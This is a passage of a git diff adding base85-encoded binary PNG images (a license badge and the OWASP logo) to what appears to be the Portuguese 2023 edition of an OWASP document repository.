z={9**a?ChD`5c2pMO#!^+)TSk0GBqR(hfLlS&KY(nCPiQ!O3pVXoBM z{EQCY^N7D?nsmkb`K-L$L%5cDCv5c7%avqJ__pzifX-lNYY@Vxq(V})!T&s<)Yq(t z1iKL%L)SW=2cA}=I`{rXmsh!tZw>8N&MkEhoUdeVcK~__(iv8q6uIvvD@p%r+n&-uP( zE<)Cxz%A}ixKBMhdtkF^sj!8b+s5GS*j|4oLlgC?m9F*^@afyz$;wl>t{GAP#hLDH z#;HxpuBo;}Y_BY{DkIKy5;$OQ?;PkK1Id2;3K+C@u?soCAx{K3;> z@NPur*wx>fU-F!TE;XKUY2KM8w|~=){#xyJdhIqz_G`81cCNX(qX7(z#J`T@qZWpm7{5*by zuf%|Eem)Zb{O)UW?EDi}7BImTvtL3ay+*-$)E*Gf@tix(N>6risa%-6cT&6RPqF6U zpHt$Ki};$FbN zB?Lk|W?HXYKR-41eR-t0I9RIahj6`N$UXXJIUef%6?jFB4Dk_&x|z)pa%EcexH`Gt zof4AKGwOJ|$a6alRk1g|vD9t97rEw4+!TMRT{LCfPjhloh`1?NgAFAcZ*5s^(g%7VC4IgG*6E`ouK`@F78s*MEAcQeGU9{95C-@QAS!{X5hyu%hCpa&^bm7T zK=(47ZMin&%VM$Uj@{(tSVeiX{zveB`)w;yK|n38V5` zmYUp*>gnNS7aGB*IbY+`zeb0lk@q(iukl2y&H) z#kjhOAom*fk-M?D2YNuM@P)ZyUQ}lc_GrpsjHf{y^xY5Bk-3l zv9?LnM|zWqdonrRS(~}%ld(7|s9^&@uGpl0%U^<>5v8*#__NkjULcYNN~*}4SeS4j z)AwGK+x>Z8o6n*VaD+yOb&<1e#RXSst=(Lc%4>s&jeF|KYn92U(&e65$^1IYK<$Z~ z>_MY}D0rI>X1-bW!ln-M%&C#GWNLz+>C=zB*fIqQWZG;=5xCDI?ZEpUeOutB80jQ;q`V{a~KB$uj6GW z;7f9`VQh&$kKw&Ksspno8tIN{aP8=Us0tb(^81|gue(L4A--l`)XE)L4)!(X%RM?A zkfd$UMIWR@w@E;E7N>E_`uNu z7b*y!h&}*=5nfb_nHigYcIV;jB+jl#7Xn7h$xw zhm>pK%u_%&)km9-*jd!a4SSDzt_IaW*^}Dlj}+omku`EF^ZP4^c~Qx~^kzAmmrYIC zwVQ2h3i7OMUs>x=fAQqgYZvGD)^W>>8UOdO;1Eggz6=0UnAVxuUeV%qktwLW-1J2Q z&yog*`$#;SlA4?-PT2HcWQVUa z*b+0g{m7i$~sNUOgI>=)@( zSr~otyc9fjnTwyRyOuD^()YOLkZQYe%0BWGEO>RGl}Wus2g2Tx#xS#?o)>Wvxu$rb z5@+(gpTSo9TT$M(s4=JPiDh8huE3|lR_s!jMO?A#jJkS2`$_8G+u3LU1P#0(SNm?k zJ?HhtcjT%z`xe+KB^GpkMkb5r-qA#(J8?l{+nG0c8}xRI0DurE)~)_>8RQHP4_CF; zma>X-8e4f%s6nkM1S{fHQ8k=DdCC#zzjMX{fIp)_AXm)uiYz+(eH58IkKL{Kq?TGE z2ZsUaqgxF1R=p<3);%jW2$8T{xJjYFOz-gbde=_?)Nqti0YX>Pk|UwSYCzwwzpUTv z8)DW^hW}4{*8b1*8pqp=SaOSGl6AqcTyS9B?W&5yjHk~eOM*&ZPf#k5(J4>n;6#uhTKHiXW&Ddqc+@6#y&^) zy%Ky%>xtr>mpmwYL)jX|p6m<@{GddodZmq(h9z*TNKUE$Os~2snBy0SH!S1FlEqt@9`}zbsY(jW~z@R-XTlbER__WtX z6%foEsUEwL4u;q_Q4RDe!MhesN~kLd&tCxI#Zv8^-*C0#Tw|ssilS6MH15*L28>TR zNipHe($2nnpFVWPAP2V~_ENfzyDS!YBrh2stu+|7ZY2}K!3v~R8RIUK 
zYOw5TZp6pW2P4w0b19U16@_voQ}O;zHI0@XM}IZjItFSrV7zmQKPM0tI`%XAC4Mc~ zghb)Q*>nS{$DPKp`rtFADpdATC7@yrdq&}9K(U2X2j}5_2z$w>E8l26)K0##$YF}b zk0kBg-^EW5Ti4BSY8-o}y#Vc~a~q%t3sAJ=1(E!O39SuIv&)oskh;T81 z?6Wp7E4Ig*A#~iZyfF917eS5{`C=Ojn;mQkp=;z}e28%E@D*BOK{Wk%YHiAFrxu%X zAv`7(;XD+gy<9hOduVe*u-o}?Pou!=<1TK_g)PIqmK-V{bh7+_0;Jzovv%rK__zB* zvTPgcMSr9i`*mQ&%Vz?U(FUe&scZ_xD@m&AA5ao}aH5gu3k$stqQ5E)1j%zinO&Qm zwTyC_ZQ+gpmAk}npGE0c^dg16gCPUiEKXM&Jac#;>pVJr@+s-V6?$$za}#N%?aIwHz9;a_)M;F}m}pYeZ7 z=;EXe@nv@l57yX^6eNpBhmZH9Q|9PzDz-)G0e=x$szmFHj2@;dtg7#F&UOSM*vmmS>Z?U*%a4=*IV6?W`eifFS)|;jc!wCw+3QA0Z^akuVb*sADVS} zDC3S!k72_Ap*eOVi~+bj!j8?>PFVkC z-j(;Ee%ck4R7dA`P1?BA=3+zG6U@MthLF0}yQkp>R`M|B(Vi<+B6iZ*zz31#qohD$ ztvlvD3;B;t_pXsG9}}sZ%;nR!UNhz~VpakeF{+KqH7mS9x#Xku!AP919(Hki4Xt>B zKn*moax$|J`d0@G7Mkb7uAL;GyZut}nz2 z2k<@YkG$!aoIIwV29x)C+XRuFDuK&LvwpRxI3^obSpng(S#(-1gZ@Ypnrb7s5E&*} zC3kL#ZUjMk*Y#bf?~Kn{Mmj~jCvAyDEHpG{z1-=qRBrSL5G3(;Rx>ee*wP@6%drdR z-IooxZ`+uyP{GvWJ^Ee73G2@5qIHYU9Jpx7&s|X|y)P$fah+xiS$>ed{riA76&fMa6Ln`T@n z3G-qPxl3zlOt&N;Miw)a_9bC-5{?OMl=hC`bbRc{WZ12f0pB{3&2ah9r>Nd!3g%mq zbLq9p;#8CLthg_Q^de8adE`0(^2P1>;5kU@@@_7$`el6E?1`WmU_OKB!mA0iRde&y n5`Z(57T;g`-h%(L3Z^$l9HN~lnR#iv0C=`}@50_dha~?8W}XoO literal 0 HcmV?d00001 
diff --git a/editions/2023/pt-pt/images/license.png b/editions/2023/pt-pt/images/license.png new file mode 100644 index 0000000000000000000000000000000000000000..124d3ba4d4a20805cc0d23bce12d8f00f1acd27d GIT binary patch literal 14003 zcmV;kHcZKhP)Px#32;bRa{vGr5&!@f5&>tQ(oz5bHdskSK~#7F?VSm5R@as1kC21}5+Ee82nqNE zVv*Q4+t?Umn;38H*vTYLDxJh}lJ2SLtX-+;RC*@WJzYKHq$;WIRHeJdi5(}-;>1b3 z;n)Um*aowieG?!MAQqto5D1}_`Tx$-l|N(&vwRXH!-Y@Z^4`1e-gD1A=YN)aU(#8X zZQHh5Wo4yRR2(#YwWOpZyH>7I;Ln8u@N7#* zS|iQw41NV=A#LiDnryYTwbt6)Vq3Oswv@)kM$5^`7A_fX*+a6erKtsqCaf@!5D1u) znw)A$DG|}a4Fa13f0~<{tyx&9t+mx!)WAU0aPFVe``NQ?mPEhP`dS|`%8BDAtiJxV z9j`fNryEW?dvx?i$NTs1CmN;NkYPh?;GjW%4K!&u)6mXL9cL%}19J-gO-@O+G>uc^ znI=1Zy56d)s_kUmNsUKfV9rajRJF5Tdb$l6KGX&d9AL@G$=1};Y^_bLaRMyi&Fr>9 zcqk<;#fFc_vr{Kd+R>v&Ed{2dWB!t~Kw?DmvD%(JMK*kG~qvG+O=1Q&x8H zh}9gg_0Ir(mrNp3TU)C$emaC2GQ@I+4zbJunU*V91fzqUTE*zCt-7X{rPp~odY*#} zKDJ7$7^3EAjcwh$)eh`GV5dZfQzuVaQ*)F05=la;L5TNF*Thdv6{8HaAw!4S@Vwy? zHhESsGT)k{Ua2dxea>^^i#nuH7Clo^Q>?G<3saw}J7pW*TW?1W9kJ?aF}0YazP?`f z4II&Cee^FSCB;(HQf*MyAj{9sS9^z8(S&g}NE5Od25%p;i)zkgoD5?-ZPX#ON3(=t zN|1`KPTCKIZd~}iRJ8_&Nx}fYxG-azwQ2^Pa%okztIQ6IV09-?IK!T8jl@LT*@&_G z_v`OO8YxMUEe+B~6*?r+dy*ttiX=THYNvnl?^n;C_h~>Io1_U(pKh=N`wrNaO`Gk| zp~L!q+L{^~t+};X9eJOzp{L6C^T zxcAYFa-kv3(0aPnDm6aaw{EvX2M<|oO|6}2I3wxZ7}4Bs8bJ|+7ZahMw9K*EAO;veU$4R0gDtNh-__jU!GkSZ(tAX~2ul$`ksi!W@y=CMU``kX z3E0%oWP8i^+M$X=w({Low(8xLF2#JnIZ=hrp)e?vFgWxNx7FxanV74=CKOL}c+#(5 zx-~bc@0SU@xidnD$y8HWd0iFSN;`Lz?(*@ft*x=~ z6UJM?r~*myEJ^WPO&a>u`(p)dFN?9M01OFaK+PVMAG~yXsjFRP{b9X0hExdeVGuhL zi{FnNK4Mizt9+6m5wfJ}hUEKt+)sfj5d3{KRYu!9E=+WgyY zv2o+aiP1+}&X63RB+=x)_}LxW+9JqMx$lUrS-r+~mhQB&on?07#0i(sv@JV7+lJ)k z+5mmVKH^1T91%`HlqzA_Lx&GrwS?EQ*O%F*bsKGB$wbSSBVyW&X*P27NT*Af1id*{ zm&DjX*gzyYiP}0WRl8pJtbA{|9hZ7ypum%qWX*bvjTEpP7+l|Z=lU=}Fexw8FYnab z;zT^7`j3g}E3NkUF&i~%lo&nFkmS?@(Rf|S!tHB>Nzqo|>FwKg*#7c;-iM5g3@g#3 zoH}i)4I4gO8c7mO@FF84(`i7v=_|~9>eMN#*uUSl@7Q5gst+r_Mp|$E+Vytg*a<

Uzg;J|Z7%odm(|UAt`L$dOjI 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 Z{{w%yKW;Ey?d1Rf002ovPDHLkV1f{D7>ob_ literal 0 HcmV?d00001 
diff --git a/editions/2023/pt-pt/images/owasp-logo.png b/editions/2023/pt-pt/images/owasp-logo.png new file mode 100644 index 0000000000000000000000000000000000000000..b0af38b2735bf99d3f54af35cd2b9f503d7d0fa7 GIT binary patch literal 11091 zcmd6Ng_Jzu+fqtEghqzLkWp7P(To=Q6o2` zM{IPBddKg5|A_awuI+lxIrq8m&mGS>PkdtEXsc3?GLixS019=r7kU7|9Si_)%i{(gE( z{a)-U;=;g=q~SsuVIg}ASD$>ZCoUA`^t1kfhr+1eqmYoCMWO$e9;)aaSa>BosVM29 zy^{!Pg?w^shLI^1s zqGDKtyKLS_VQzqU5GeOxx6e&y_hh91@hjsV8cMkc&Z48HPxCsz-+d5{qA4_@-b1C= zHIXGQ=J=bjs0NM-BA40f^dd47Rf5Mc)9MS`thX|rFYLrDeViSj*JsgJaFld7k?sp> z%NF_acM-U$(j_0hOw4PiGf*C-D*VHeta3SqqDSU~Rk^?$wy4?EhrX3!j@uo&-E=fm z5{HBFc5@b=$s|qhja7=xl&Dd?{WYef^>(e#>O-CRF*qK`4+`g@38%IXtX$+@uA5LT zkT%|YC?Fh`@Ak9Zi*e3m#fVG@P#7RKS+i5S7NC%)c|d_bJL$|0448odi1u^H2Y~cX|)~y(B&mDUHhuk$+NkO~QR2 z&g=JGd#i{a8;I1#e|$q+{pG*2cm2sKhA;KsOjeiHzI0B{tzXL(r~?^@e}C^ZGdTar zkY1-YA2kp67qB3zdnV9o^2F+O1#O&BL~W+!qVCr342z91ervxo!`j&-1p#r_R?`C` zGwl4=W&Fv!fX~j?DdjsAVq=KpXbM)liCBvqk@1PFGA*bblB7xHD2)-Gd@e06GeP&g z@p4<8!oDH#L8BE`fhA2O{(QWDD~U68mcb<*U^cCorKnX4>eP706>uA=6B2g ztD+yFlf*||>m|tw$$t;H`K?(bP62?&0QDEj282r>Pv`Sf_28+_gEir|nORMdJ-_(< zuy({pPn8=V@bUh-tMQZgS=TqZph8B@r}Z}2^f`Ktu%7$hfo7Y@gZvs6^_(R*0>qh{DU zzv`e)rhZ6(_y5_UWE~L4=aEp+!NX+DEs&7+u`SX002BVOnR9AWV8`%H- zuG#^a8Qo57zXJe-<1Bk=Djx2|X6Tq0F9`}H6T+^9K&61w_uh>qeEXk-+8-X}I@|dF 